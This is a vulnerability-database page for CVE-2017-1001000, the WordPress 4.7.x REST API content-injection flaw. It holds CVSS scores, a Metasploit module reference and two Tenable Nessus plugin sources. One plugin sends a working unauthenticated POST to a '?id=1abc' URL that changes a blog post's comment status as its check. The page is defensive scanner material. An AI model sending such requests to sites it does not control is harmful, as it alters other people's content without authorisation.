Vulnerabilities > CVE-2017-1001000 - Unspecified vulnerability in Wordpress 4.7/4.7.1/4.7.2

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
HIGH
Availability impact
NONE
network
low complexity
wordpress
nessus
metasploit
NVD
Published: 2017-04-03
Updated: 2023-11-07

Summary

The register_routes function in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php in the REST API in WordPress 4.7.x before 4.7.2 does not require an integer identifier, which allows remote attackers to modify arbitrary pages via a request for wp-json/wp/v2/posts followed by a numeric value and a non-numeric value, as demonstrated by the wp-json/wp/v2/posts/123?id=123helloworld URI.

Vulnerable Configurations

Part Description Count
Application
Wordpress
3

Metasploit

descriptionThis module exploits a content injection vulnerability in WordPress versions 4.7 and 4.7.1 via type juggling in the REST API.
idMSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_CONTENT_INJECTION
last seen2020-06-13
modified2019-06-05
published2017-02-03
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wordpress_content_injection.rb
titleWordPress REST API Content Injection

Nessus

  • NASL familyCGI abuses
    NASL idWORDPRESS_REST_API_PRIV_ESC.NASL
    descriptionThe WordPress application running on the remote web server is version 4.7.x prior to 4.7.2. It is, therefore, affected by a privilege escalation vulnerability in the REST API due to a failure to properly sanitize user-supplied input to the
    last seen2020-06-01
    modified2020-06-02
    plugin id97210
    published2017-02-16
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/97210
    titleWordPress 4.7.x < 4.7.2 REST API 'id' Parameter Privilege Escalation
    code
    #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(97210);
  script_version("1.6");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id("CVE-2017-1001000");
  script_xref(name:"EDB-ID", value:"41223");
  script_xref(name:"EDB-ID", value:"41224");
  script_xref(name:"EDB-ID", value:"41308");

  script_name(english:"WordPress 4.7.x < 4.7.2 REST API 'id' Parameter Privilege Escalation");
  script_summary(english:"Attempts to disable comments on a blog post.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a PHP script that is affected by a
privilege escalation vulnerability.");
  script_set_attribute(attribute:"description", value:
"The WordPress application running on the remote web server is version
4.7.x prior to 4.7.2. It is, therefore, affected by a privilege
escalation vulnerability in the REST API due to a failure to properly
sanitize user-supplied input to the 'id' parameter when editing or
deleting blog posts. An unauthenticated, remote attacker can exploit
this issue to run arbitrary PHP code, inject content into blog posts,
modify blog post attributes, or delete blog posts.

The WordPress REST API is enabled by default as of version 4.7.0. This
vulnerability was silently patched in WordPress version 4.7.2.

Note that WordPress is reportedly affected by additional
vulnerabilities; however, Nessus has not tested for these.");
  # https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?49ca66d9");
  # https://blog.sucuri.net/2017/02/wordpress-rest-api-vulnerability-abused-in-defacement-campaigns.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?172a71ca");
  script_set_attribute(attribute:"see_also", value:"https://thehackernews.com/2017/02/wordpress-hack-seo.html");
  # https://github.com/WordPress/WordPress/commit/89d7d9e70f7d33f4064ca884fa9f30f48b69655e
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f1dc5ff8");
  script_set_attribute(attribute:"solution", value:
"Upgrade to WordPress version 4.7.2 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-1001000");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/02/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/01/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/02/16");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
include("json.inc");

vuln = FALSE;
fixed = FALSE;
app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port,
  exit_if_unknown_ver : TRUE
);

dir = install['path'];
ver = install['version'];
install_url = build_url(port:port, qs:dir);
url_path = install['Redirect'];
if (!isnull(url_path)) url = url_path;
else url = dir + "/";

# Check if version is 4.7.x < 4.7.2
if (ver =~ '^4\\.7' && ver_compare(ver:ver, fix:'4.7.2', strict:FALSE) < 0) {

  # Get id, comment_status, and link for first blog post
  # All installs should have at least 1 blog post with an
  # 'id' of '1' since by default WordPress has a 'Hello
  # World' blog post on install
  url1 = "/wp-json/wp/v2/posts/1";
  res1 = http_send_recv3(
    method : "GET",
    item   : url1,
    add_headers : make_array("Content-Type", "application/json"),
    port   : port,
    exit_on_fail : TRUE
  );

  if (
     "200 OK" >< res1[0] &&
     "modified_gmt" >< res1[2]
  ) {
    json_data = json_read(res1[2]);
    orig_comment_status = json_data[0]['comment_status'];
    link = json_data[0]['link'];
  }
  else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);


  # Attempt exploit on blog post by changing comment_status
  # and verify if vuln
  url2 = "/wp-json/wp/v2/posts/1?id=1abc";
  if ( "open" >< orig_comment_status ) {
     postdata = '{"comment_status":"closed"}';
  }
  else postdata = '{"comment_status":"open"}';

  res2 = http_send_recv3(
    method    : "POST",
    item      : url2,
    data      : postdata,
    add_headers : make_array("Content-Type", "application/json"),
    port         : port,
    exit_on_fail : TRUE
  );

  attack_req = http_last_sent_request();

  if (
     "200 OK" >< res2[0] &&
     "modified_gmt" >< res2[2] &&
     !empty_or_null(orig_comment_status)
  ) {
    output = strstr(res2[2], "comment_status");
    if (empty_or_null(output)) output = res2[2];
    json_data = json_read(res2[2]);
    changed_comment_status = json_data[0]['comment_status'];
    if (!empty_or_null(changed_comment_status)) {
      if (changed_comment_status >!< orig_comment_status) {
        vuln = TRUE;
      } else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);
    } else exit(0, 'The comment_status value could not be parsed from the JSON response.');
  } else audit(AUDIT_RESP_BAD, port, 'REST API requests');


  # If exploit successful, exploit again to change back
  # to original comment_status
  url3 = "/wp-json/wp/v2/posts/1?id=1abc";
  if ( "open" >< changed_comment_status ) {
     postdata = '{"comment_status":"closed"}';
  }
  else postdata = '{"comment_status":"open"}';

  res3 = http_send_recv3(
    method    : "POST",
    item      : url3,
    data      : postdata,
    add_headers : make_array("Content-Type", "application/json"),
    port         : port,
    exit_on_fail : TRUE
  );

  if (
     "200 OK" >< res3[0] &&
     "modified_gmt" >< res3[2]
  ) {
    json_data = json_read(res3[2]);
    verify_comment_status = json_data[0]['comment_status'];
    if (!empty_or_null(verify_comment_status)) {
      if (verify_comment_status >< orig_comment_status) {
        reset = 'Nessus was able to set the comment_status to "' + changed_comment_status + '"\n';
        reset += 'and then reset the comment_status back to "' + orig_comment_status + '" for the\n';
        reset += 'following blog post:\n';
        reset += '\n';
        reset += link + '\n';
        reset += '\n';
      } else {
        reset = 'Nessus was able to set the comment_status to "' + changed_comment_status + '"\n';
        reset += 'but was not able to reset the comment_status back to "' + orig_comment_status + '" for the\n';
        reset += 'following blog post:\n';
        reset += '\n';
        reset += link + '\n';
        reset += '\n';
        reset += 'This post should be manually reviewed by a WordPress administrator to see\n';
        reset += 'if commenting is still allowed on the post.\n';
      }
    } else exit(0, 'The comment_status value could not be parsed from the JSON response.');
  } else audit(AUDIT_RESP_BAD, port, 'REST API requests');

# Audit out if version is not 4.7.x < 4.7.2
} else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);


# Report if vuln or audit out
if (vuln)
{
  security_report_v4(
    port       : port,
    severity   : SECURITY_WARNING,
    generic    : TRUE,
    request    : make_list(attack_req),
    rep_extra  : reset
  );
  exit(0);
}
else
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);
  • NASL familyCGI abuses
    NASL idWORDPRESS_4_7_2.NASL
    descriptionAccording to its self-reported version number, the WordPress application running on the remote web server is prior to 4.7.2. It is, therefore, affected by multiple vulnerabilities : - An information disclosure vulnerability exists in the class-wp-press-this.php script due to a failure to properly restrict the user interface for assigning taxonomy terms. An authenticated, remote attacker can exploit this to disclose sensitive information. (CVE-2017-5610) - A SQL injection (SQLi) vulnerability exists in the class-wp-query.php script due to a failure to sanitize input to post type names. An unauthenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data. (CVE-2017-5611) - A cross-site scripting (XSS) vulnerability exists in the class-wp-posts-list-table.php script due to improper validation of input to the posts list table. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user
    last seen2020-06-01
    modified2020-06-02
    plugin id96906
    published2017-01-31
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/96906
    titleWordPress < 4.7.2 Multiple Vulnerabilities
    code
    #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(96906);
  script_version("1.8");
  script_cvs_date("Date: 2019/03/29  9:51:59");

  script_cve_id(
    "CVE-2017-5610",
    "CVE-2017-5611",
    "CVE-2017-5612",
    "CVE-2017-1001000"
  );
  script_bugtraq_id(95816);
  script_xref(name:"EDB-ID", value:"41223");
  script_xref(name:"EDB-ID", value:"41224");
  script_xref(name:"EDB-ID", value:"41308");

  script_name(english:"WordPress < 4.7.2 Multiple Vulnerabilities");
  script_summary(english:"Checks the version of WordPress.");

  script_set_attribute(attribute:"synopsis", value:
"A PHP application running on the remote web server is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"According to its self-reported version number, the WordPress
application running on the remote web server is prior to 4.7.2.
It is, therefore, affected by multiple vulnerabilities :

  - An information disclosure vulnerability exists in the
    class-wp-press-this.php script due to a failure to
    properly restrict the user interface for assigning
    taxonomy terms. An authenticated, remote attacker can
    exploit this to disclose sensitive information.
    (CVE-2017-5610)

  - A SQL injection (SQLi) vulnerability exists in the
    class-wp-query.php script due to a failure to sanitize
    input to post type names. An unauthenticated, remote
    attacker can exploit this to inject or manipulate SQL
    queries in the back-end database, resulting in the
    disclosure or manipulation of arbitrary data.
    (CVE-2017-5611)

  - A cross-site scripting (XSS) vulnerability exists in the
    class-wp-posts-list-table.php script due to improper
    validation of input to the posts list table. An
    unauthenticated, remote attacker can exploit this, via a
    specially crafted request, to execute arbitrary script
    code in a user's browser session. (CVE-2017-5612)

  - A privilege escalation vulnerability exists in the REST
    API due to a failure to properly sanitize user-supplied
    input to the 'id' parameter when editing or deleting
    blog posts. An unauthenticated, remote attacker can
    exploit this issue to run arbitrary PHP code, inject
    content into blog posts, modify blog post attributes, or
    delete blog posts. (CVE-2017-1001000)

Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.");
  script_set_attribute(attribute:"see_also", value:"https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/");
  script_set_attribute(attribute:"see_also", value:"https://codex.wordpress.org/Version_4.7.2");
  script_set_attribute(attribute:"solution", value:
"Upgrade to WordPress version 4.7.2 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5611");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/01/26");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/01/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/31");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("www/PHP", "installed_sw/WordPress", "Settings/ParanoidReport");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("vcf.inc");
include("http.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

app = "WordPress";
port = get_http_port(default:80, php:TRUE);

app_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);
vcf::check_granularity(app_info:app_info, sig_segments:2);

constraints = [
  { "min_version":"3.5", "fixed_version":"3.7.18", "fixed_display" : "3.7.18 / 4.7.2" },
  { "min_version":"3.8", "fixed_version":"3.8.18", "fixed_display" : "3.8.18 / 4.7.2" },
  { "min_version":"3.9", "fixed_version":"3.9.16", "fixed_display" : "3.9.16 / 4.7.2" },
  { "min_version":"4.0", "fixed_version":"4.0.15", "fixed_display" : "4.0.15 / 4.7.2" },
  { "min_version":"4.1", "fixed_version":"4.1.15", "fixed_display" : "4.1.15 / 4.7.2" },
  { "min_version":"4.2", "fixed_version":"4.2.12", "fixed_display" : "4.2.12 / 4.7.2" },
  { "min_version":"4.3", "fixed_version":"4.3.8", "fixed_display" : "4.3.8 / 4.7.2" },
  { "min_version":"4.4", "fixed_version":"4.4.7", "fixed_display" : "4.4.7 / 4.7.2" },
  { "min_version":"4.5", "fixed_version":"4.5.6", "fixed_display" : "4.5.6 / 4.7.2" },
  { "min_version":"4.6", "fixed_version":"4.6.3", "fixed_display" : "4.6.3 / 4.7.2" },
  { "min_version":"4.7", "fixed_version":"4.7.2", "fixed_display" : "4.7.2" }
];


vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_HOLE,
  flags:{xss:TRUE, sqli:TRUE}
);

References